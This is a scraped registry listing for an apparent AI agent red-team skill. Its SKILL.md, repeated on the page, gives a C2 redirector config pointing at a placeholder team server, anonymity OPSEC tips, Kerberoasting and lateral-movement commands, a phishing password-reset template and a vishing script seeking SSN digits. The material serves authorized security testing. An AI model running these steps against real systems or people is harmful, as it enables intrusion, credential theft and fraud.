Creator · Masriyan
Last updated · Sep 5, 2026
Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting
Creator · Masriyan
Last updated · Sep 5, 2026
Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting
Creator · Masriyan
Last updated · Sep 5, 2026
Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting
Creator · Masriyan
Last updated · Sep 5, 2026
Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting
Do not auto-install
Install targets
Codex install prompt
Install the "Red Team Operations & Engagement Planning" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"masriyan-red-team-operations-engagement-planning","task":"Install Red Team Operations & Engagement Planning","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Deep research, source comparison, literature review, RAG, knowledge search, and reports.
Scenario
Research agents
I need my agent to research a topic, compare sources, and produce a concise report.
Agent fit
Claude Code + Browser agents + CLI
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Maintenance
fresh
2d since push
Risk
Needs review
Dependency or permission surface needs review
GitHub quality
397
77/100 Quality · 66/100 Trust
Coverage tags
Review notes
Dependency or permission surface needs review · Permission surface may require sandboxing
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
StrongSolid option that is likely worth shortlisting for production workflows.
Trust
Do not auto-installTrust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Choose a stronger alternative or inspect the source manually before any install attempt.
Stars
397 GitHub stars
Repo activity
397 stars, 75 forks
Maintenance
2d since push
License
MIT
Install
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningDo not use when
Alternative
174.2K Stars
npx skills add anthropics/skills --skill frontend-design
Alternative
84.4K Stars
npx skills add Leonxlnx/taste-skill --skill design-taste-frontend
Alternative
174.2K Stars
npx skills add anthropics/skills --skill canvas-design
Alternative
174.2K Stars
npx skills add anthropics/skills --skill brand-guidelines
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill may drive a browser or interact with web pages.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
medium
Skill may read or write project files, documents, generated artifacts, or local workspace state.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
Agent should check
Copy prompt
Task: Use Red Team Operations & Engagement Planning in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install
Install command: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
LLM text format
/api/skills/masriyan-red-team-operations-engagement-planning/install?format=text
Find alternatives
/api/skills/search?q=Red%20Team%20Operations%20%26%20Engagement%20Planning&limit=3
Agent prompt
Use Red Team Operations & Engagement Planning for this task. Review https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install, then install with: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/masriyan-red-team-operations-engagement-planning
LLM text
/api/registry/manifest/masriyan-red-team-operations-engagement-planning?format=text
Install alias
/api/registry/install/masriyan-red-team-operations-engagement-planning
Recommend
/api/registry/recommend?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&limit=3
Agent fit
Research agents
Use-case tags
Platforms
Claude Code, Browser agents
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Shortlist this skill and compare it with close alternatives before production adoption.
Role in stack
Companion skill
Primary fit
Research agents
Trust label
Strong shortlist
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
GitHub adoption
INFO397 GitHub stars
Stars/forks activity
INFO397 stars, 75 forks; issue activity unavailable in current metadata
Recent maintenance
PASS2d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Choose a stronger alternative or inspect the source manually before any install attempt.
Quality profile
Solid option that is likely worth shortlisting for production workflows.
Workflow fit
Investigate faster
I need my agent to research a topic, compare sources, and produce a concise report.
Automate repeated work
I need my agent to automate a repeated workflow across tools and files.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Find, compare, and synthesize
A workflow for agents that gather sources, compare claims, summarize long material, and draft useful research briefs.
Turn skills into distribution
A workflow for turning newly indexed skills into SEO briefs, social drafts, comparison pages, and reusable publishing workflows.
Alternative shortlist
Similar skills that may fit this task.
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
--- name: Red Team Operations & Engagement Planning description: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting version: 3.0.0 author: Masriyan tags: [cybersecurity, red-team, c2, lateral-movement, persistence, pentest, engagement, opsec] ---
# Red Team Operations & Engagement Planning
## Purpose
Enable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.
> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it. > > **Authorized contexts:** > - Signed Statement of Work (SOW) or Rules of Engagement (ROE) > - Bug bounty program (confirm target is in-scope) > - Internal security testing (confirm organizational authority) > - CTF competition (confirm challenge platform and scope) > - Research in owned/isolated lab environment
---
## Activation Triggers
This skill activates when the user asks about: - Planning a red team engagement or adversary simulation - Designing C2 infrastructure (redirectors, team servers, C2 profiles) - Active Directory attack paths (BloodHound, Kerberoasting, DCSync) - Lateral movement techniques for authorized engagements - Persistence mechanisms in red team context - Social engineering campaign planning (authorized) - Red team reporting and executive presentations - Tabletop exercises (TTX) design - Purple team collaboration - OPSEC planning for authorized operations
---
## Prerequisites
```bash pip install pyyaml requests ```
**Tools for authorized operations:** - `Cobalt Strike / Sliver / Havoc` — C2 frameworks - `Metasploit` — Exploitation framework - `BloodHound / SharpHound` — AD attack path analysis - `Impacket` — Network protocol tools - `CrackMapExec / NetExec` — AD enumeration - `Responder` — LLMNR/NBT-NS poisoning - `Mimikatz` — Credential access (Windows)
---
## Authorization Verification
**Before any operational planning, Claude asks:**
``` Red team assistance requires authorization confirmation:
1. What is the engagement type? □ External penetration test □ Internal network assessment □ Red team / adversary simulation □ Social engineering assessment □ Physical security assessment □ CTF competition
2. What is your authorization basis? □ Signed SOW / contract with target organization □ Internal role (IT/Security team testing own systems) □ Bug bounty — [program name] □ CTF — [platform and challenge name]
3. What is the defined scope? (IP ranges, domains, systems, excluded assets)
4. Who is the target organization's security point of contact? (For deconfliction — required for IR-level engagements)
Confirm before proceeding. Operational assistance without confirmed authorization cannot be provided. ```
---
## Core Capabilities
### 1. Engagement Planning
**When the user asks to plan a red team engagement:**
**Engagement Planning Framework:**
```markdown # Red Team Engagement Plan **Client:** [Organization Name] **Engagement Type:** [Full Red Team / CRTO / APT Simulation] **Start Date:** [Date] **End Date:** [Date] **Rules of Engagement Version:** 1.0
## Objectives - Primary: [e.g., Test detection and response capabilities against APT29 TTPs] - Secondary: [e.g., Identify privilege escalation paths to Domain Admin] - Out of Scope: [e.g., Production databases, payment systems, physical access]
## Threat Profile **Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile] **Initial Access Vector:** [Spearphishing / Supply chain / Watering hole] **Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]
## Attack Kill Chain Phases 1. Reconnaissance → OSINT, subdomain enum (Skill 01) 2. Initial Access → Phishing / external vuln exploitation 3. Execution → PowerShell / LOLBins / custom implant 4. Persistence → Registry / service / scheduled task 5. Privilege Escalation → Local privesc → Domain Admin 6. Defense Evasion → Process injection / AMSI bypass 7. Credential Access → LSASS / Kerberoasting / DCSync 8. Lateral Movement → PSExec / WMI / RDP 9. Collection → Identify critical data 10. Exfiltration → Staged transfer to simulated C2
## Rules of Engagement - Testing hours: [24x7 / Business hours only / Agreed windows] - Destructive testing: [Prohibited / Limited / Authorized] - DoS testing: [Prohibited] - Social engineering: [Authorized / Prohibited / Phishing only] - Physical access: [Prohibited / Badge cloning only] - Deconfliction: Call [POC Name] at [Phone] if critical systems impacted
## Emergency Abort Procedure If critical systems are impacted unexpectedly: 1. Immediately cease all operations 2. Call [POC] at [Phone] — available 24/7 3. Document what was done and when 4. Stand down until authorized to resume ```
**Engagement Planning Script:** ```bash python scripts/engagement_planner.py --scope scope.json --output plan.md ```
### 2. C2 Infrastructure Design
**When the user asks about C2 infrastructure for authorized operations:**
**Multi-Tier C2 Architecture:**
``` [Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon] → [Redirector 2 (DNS)] ← → [Beacon] → [Backup Redirector] ```
**Infrastructure Components:**
1. **Team Server** — Never directly exposed to internet; VPN access only 2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic 3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive) 4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert
**Redirector Setup (Apache mod_rewrite):** ```apache # Redirect only Cobalt Strike beacon traffic to team server # Everything else → sends to legitimate domain (blend in) RewriteEngine On RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows NT 6.1; WOW64\) AppleWebKit.*" RewriteCond %{REQUEST_URI} "^/jquery-3\.3\.1\.min\.js$" RewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L] RewriteRule ^(.*)$ https://microsoft.com/ [R=302,L] # Decoy redirect ```
**Malleable C2 Profile Considerations:** - Mimic legitimate application traffic (CDN requests, Office updates, etc.) - Match real User-Agent strings from target environment - Use appropriate HTTP headers (Host, Accept-Language, etc.) - Set sleep/jitter to blend with normal traffic intervals
**OPSEC Checklist:** ``` Infrastructure OPSEC: [ ] Team server not directly accessible from internet [ ] All redirectors provisioned from different providers than each other [ ] Domain registered with privacy protection [ ] Domain aged ≥30 days before operation [ ] TLS certificate from legitimate CA (not self-signed) [ ] Kill dates set on all implants [ ] Logging enabled on team server for post-engagement review
Operational OPSEC: [ ] VPN/Tor for infrastructure access (not home IP) [ ] Separate browser profile for research vs. operation [ ] No real name/email in domain registration [ ] Payment via anonymous method where legally permitted [ ] Implant config: sandbox detection, sleep with jitter [ ] All C2 traffic encrypted and indistinguishable from HTTPS ```
### 3. Active Directory Attack Methodology
**When the user asks about AD attack paths for authorized engagements:**
**BloodHound Analysis Workflow:** ```bash # Collection (run on domain-joined host in scope) # PowerShell-based (noisier but complete) Import-Module SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp\
# C# executable (quieter) SharpHound.exe -c All --outputdirectory C:\temp\
# Upload ZIP to BloodHound UI and analyze: # Queries to run: # - Find Shortest Paths to Domain Admins # - Find Principals with DCSync Rights # - Find Computers with Unsupported Operating Systems # - Find AS-REP Roastable Users ```
**Key AD Attack Techniques (authorized):**
| Technique | ATT&CK ID | Tool | Description | |-----------|-----------|------|-------------| | Kerberoasting | T1558.003 | Rubeus, Impacket | Request TGS for SPNs → crack offline | | AS-REP Roasting | T1558.004 | Rubeus, GetNPUsers.py | Users with no pre-auth required | | Pass-the-Hash | T1550.002 | Impacket, CrackMapExec | Use NTLM hash without cracking | | Pass-the-Ticket | T1550.003 | Rubeus | Use Kerberos ticket for auth | | Overpass-the-Hash | T1550.003 | Rubeus | Convert NTLM hash to TGT | | DCSync | T1003.006 | Mimikatz, Impacket | Replicate domain hashes | | Golden Ticket | T1558.001 | Mimikatz | Forge TGT with KRBTGT hash | | Silver Ticket | T1558.002 | Mimikatz | Forge TGS for specific service |
**Kerberoasting (authorized use):** ```bash # Using Impacket (Linux → Windows domain) GetUserSPNs.py -dc-ip 192.168.1.10 domain.local/user:password -request
# Using Rubeus (on Windows, in scope) Rubeus.exe kerberoast /outfile:hashes.txt
# Crack with hashcat hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt ```
**Lateral Movement Options:** ```bash # PsExec style (via Impacket) psexec.py domain.local/admin:password@192.168.1.20
# WMI execution wmiexec.py domain.local/admin:password@192.168.1.20
# SMB with NetExec nxc smb 192.168.1.0/24 -u admin -p 'password' --shares
# RDP (if authorized) rdesktop -u admin -p password 192.168.1.20 ```
### 4. Social Engineering (Authorized Campaigns)
**When the user asks to plan an authorized social engineering exercise:**
**Phishing Campaign Framework:**
1. **Scope confirmation** — What targets are authorized? What is prohibited? 2. **Pretext development** — What scenario is believable for this organization? - IT help desk password reset - Finance: invoice / payment confirmation - HR: benefits enrollment - Executive: board communication 3. **Infrastructure setup** — Phishing domain, email server, landing page 4. **Landing page** — Credential harvester or payload delivery 5. **Tracking** — Click tracking, credential capture, payload execution 6. **Reporting metrics** — Click rate, credential submission rate, report rate
**Pretext Template (for authorized campaigns):** ``` Subject: Action Required: IT Security Policy Update — Password Reset Required
From: IT Help Desk <helpdesk@[spoofed-or-lookalike-domain]>
Dear [Name],
As part of our ongoing security improvements, all employees must update their passwords by [date]. Please click the link below to verify your identity and reset your password:
[Phishing Link]
If you did not receive this email or have questions, contact the IT Help Desk at x4444.
Regards, IT Security Team [Company Name]
--- [Include realistic footer with physical address, unsubscribe link for legitimacy] ```
**Vishing Script Template:** ``` Caller: "Hi, this is [Name] from IT Security. We've detected some unusual activity on your account. I need to verify your identity. Can I get your employee ID and the last four digits of your SSN?..." ```
### 5. Red Team Reporting
**When the user asks to create a red team report:**
```markdown # Red Team Assessment Report **CLIENT CONFIDENTIAL**
**Organization:** [Client Name] **Assessment Type:** [Red Team / APT Simulation] **Assessment Period:** [Date] to [Date] **Report Date:** [Date] **Report Classification:** Client Confidential
---
## Executive Summary [2-3 paragraphs: what was tested, what was found at high level, key recommendations. Written for non-technical executives.]
**Overall Risk Rating:** [Critical / High / Medium / Low]
**Key Findings:** 1. Initial access achieved via [vector] within [timeframe] 2. Domain Admin achieved via [technique] after [timeframe] 3. Detection gap: [N] hours from initial access to detection 4. [N] objectives achieved out of [N] defined
---
## Attack Timeline | Phase | Time | Action | Detection? | |-------|------|--------|-----------| |
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for Red Team Operations & Engagement Planning, ready for a manual X post.
Red Team Operations & Engagement Planning: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral... 397 stars https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x
Listing + install path for Red Team Operations & Engagement Planning: https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=x Install: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operatio...
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to Masriyan but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/audit)
[](https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)Masriyan
@masriyan
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Do not auto-install
Frontend Design
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
174.2K StarsTaste Skill: Anti-Slop Frontend
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
84.4K StarsCanvas Design
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
174.2K StarsAnthropic Brand Guidelines
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
174.2K StarsDo not auto-install
Install targets
Codex install prompt
Install the "Red Team Operations & Engagement Planning" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"masriyan-red-team-operations-engagement-planning","task":"Install Red Team Operations & Engagement Planning","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Deep research, source comparison, literature review, RAG, knowledge search, and reports.
Scenario
Research agents
I need my agent to research a topic, compare sources, and produce a concise report.
Agent fit
Claude Code + Browser agents + CLI
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Maintenance
fresh
2d since push
Risk
Needs review
Dependency or permission surface needs review
GitHub quality
397
77/100 Quality · 66/100 Trust
Coverage tags
Review notes
Dependency or permission surface needs review · Permission surface may require sandboxing
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
StrongSolid option that is likely worth shortlisting for production workflows.
Trust
Do not auto-installTrust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Choose a stronger alternative or inspect the source manually before any install attempt.
Stars
397 GitHub stars
Repo activity
397 stars, 75 forks
Maintenance
2d since push
License
MIT
Install
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningDo not use when
Alternative
174.2K Stars
npx skills add anthropics/skills --skill frontend-design
Alternative
84.4K Stars
npx skills add Leonxlnx/taste-skill --skill design-taste-frontend
Alternative
174.2K Stars
npx skills add anthropics/skills --skill canvas-design
Alternative
174.2K Stars
npx skills add anthropics/skills --skill brand-guidelines
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill may drive a browser or interact with web pages.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
medium
Skill may read or write project files, documents, generated artifacts, or local workspace state.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
Agent should check
Copy prompt
Task: Use Red Team Operations & Engagement Planning in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install
Install command: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/masriyan-red-team-operations-engagement-planning/install
LLM text format
/api/skills/masriyan-red-team-operations-engagement-planning/install?format=text
Find alternatives
/api/skills/search?q=Red%20Team%20Operations%20%26%20Engagement%20Planning&limit=3
Agent prompt
Use Red Team Operations & Engagement Planning for this task. Review https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install, then install with: npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement PlanningRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/masriyan-red-team-operations-engagement-planning
LLM text
/api/registry/manifest/masriyan-red-team-operations-engagement-planning?format=text
Install alias
/api/registry/install/masriyan-red-team-operations-engagement-planning
Recommend
/api/registry/recommend?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&limit=3
Agent fit
Research agents
Use-case tags
Platforms
Claude Code, Browser agents
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Shortlist this skill and compare it with close alternatives before production adoption.
Role in stack
Companion skill
Primary fit
Research agents
Trust label
Strong shortlist
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
GitHub adoption
INFO397 GitHub stars
Stars/forks activity
INFO397 stars, 75 forks; issue activity unavailable in current metadata
Recent maintenance
PASS2d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Choose a stronger alternative or inspect the source manually before any install attempt.
Quality profile
Solid option that is likely worth shortlisting for production workflows.
Workflow fit
Investigate faster
I need my agent to research a topic, compare sources, and produce a concise report.
Automate repeated work
I need my agent to automate a repeated workflow across tools and files.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Find, compare, and synthesize
A workflow for agents that gather sources, compare claims, summarize long material, and draft useful research briefs.
Turn skills into distribution
A workflow for turning newly indexed skills into SEO briefs, social drafts, comparison pages, and reusable publishing workflows.
Alternative shortlist
Similar skills that may fit this task.
Guidance for distinctive, intentional UI design, typography, visual direction, and non-template-like product interfaces.
Design and implementation guidance for distinctive landing pages, portfolios, product demos, and purposeful redesigns.
Create original visual art, posters, PNG assets, and PDF documents through a clear design philosophy.
Apply Anthropic official brand colors, typography, and visual standards to appropriate Anthropic-related artifacts.
--- name: Red Team Operations & Engagement Planning description: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting version: 3.0.0 author: Masriyan tags: [cybersecurity, red-team, c2, lateral-movement, persistence, pentest, engagement, opsec] ---
# Red Team Operations & Engagement Planning
## Purpose
Enable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.
> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it. > > **Authorized contexts:** > - Signed Statement of Work (SOW) or Rules of Engagement (ROE) > - Bug bounty program (confirm target is in-scope) > - Internal security testing (confirm organizational authority) > - CTF competition (confirm challenge platform and scope) > - Research in owned/isolated lab environment
---
## Activation Triggers
This skill activates when the user asks about: - Planning a red team engagement or adversary simulation - Designing C2 infrastructure (redirectors, team servers, C2 profiles) - Active Directory attack paths (BloodHound, Kerberoasting, DCSync) - Lateral movement techniques for authorized engagements - Persistence mechanisms in red team context - Social engineering campaign planning (authorized) - Red team reporting and executive presentations - Tabletop exercises (TTX) design - Purple team collaboration - OPSEC planning for authorized operations
---
## Prerequisites
```bash pip install pyyaml requests ```
**Tools for authorized operations:** - `Cobalt Strike / Sliver / Havoc` — C2 frameworks - `Metasploit` — Exploitation framework - `BloodHound / SharpHound` — AD attack path analysis - `Impacket` — Network protocol tools - `CrackMapExec / NetExec` — AD enumeration - `Responder` — LLMNR/NBT-NS poisoning - `Mimikatz` — Credential access (Windows)
---
## Authorization Verification
**Before any operational planning, Claude asks:**
``` Red team assistance requires authorization confirmation:
1. What is the engagement type? □ External penetration test □ Internal network assessment □ Red team / adversary simulation □ Social engineering assessment □ Physical security assessment □ CTF competition
2. What is your authorization basis? □ Signed SOW / contract with target organization □ Internal role (IT/Security team testing own systems) □ Bug bounty — [program name] □ CTF — [platform and challenge name]
3. What is the defined scope? (IP ranges, domains, systems, excluded assets)
4. Who is the target organization's security point of contact? (For deconfliction — required for IR-level engagements)
Confirm before proceeding. Operational assistance without confirmed authorization cannot be provided. ```
---
## Core Capabilities
### 1. Engagement Planning
**When the user asks to plan a red team engagement:**
**Engagement Planning Framework:**
```markdown # Red Team Engagement Plan **Client:** [Organization Name] **Engagement Type:** [Full Red Team / CRTO / APT Simulation] **Start Date:** [Date] **End Date:** [Date] **Rules of Engagement Version:** 1.0
## Objectives - Primary: [e.g., Test detection and response capabilities against APT29 TTPs] - Secondary: [e.g., Identify privilege escalation paths to Domain Admin] - Out of Scope: [e.g., Production databases, payment systems, physical access]
## Threat Profile **Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile] **Initial Access Vector:** [Spearphishing / Supply chain / Watering hole] **Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]
## Attack Kill Chain Phases 1. Reconnaissance → OSINT, subdomain enum (Skill 01) 2. Initial Access → Phishing / external vuln exploitation 3. Execution → PowerShell / LOLBins / custom implant 4. Persistence → Registry / service / scheduled task 5. Privilege Escalation → Local privesc → Domain Admin 6. Defense Evasion → Process injection / AMSI bypass 7. Credential Access → LSASS / Kerberoasting / DCSync 8. Lateral Movement → PSExec / WMI / RDP 9. Collection → Identify critical data 10. Exfiltration → Staged transfer to simulated C2
## Rules of Engagement - Testing hours: [24x7 / Business hours only / Agreed windows] - Destructive testing: [Prohibited / Limited / Authorized] - DoS testing: [Prohibited] - Social engineering: [Authorized / Prohibited / Phishing only] - Physical access: [Prohibited / Badge cloning only] - Deconfliction: Call [POC Name] at [Phone] if critical systems impacted
## Emergency Abort Procedure If critical systems are impacted unexpectedly: 1. Immediately cease all operations 2. Call [POC] at [Phone] — available 24/7 3. Document what was done and when 4. Stand down until authorized to resume ```
**Engagement Planning Script:** ```bash python scripts/engagement_planner.py --scope scope.json --output plan.md ```
### 2. C2 Infrastructure Design
**When the user asks about C2 infrastructure for authorized operations:**
**Multi-Tier C2 Architecture:**
``` [Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon] → [Redirector 2 (DNS)] ← → [Beacon] → [Backup Redirector] ```
**Infrastructure Components:**
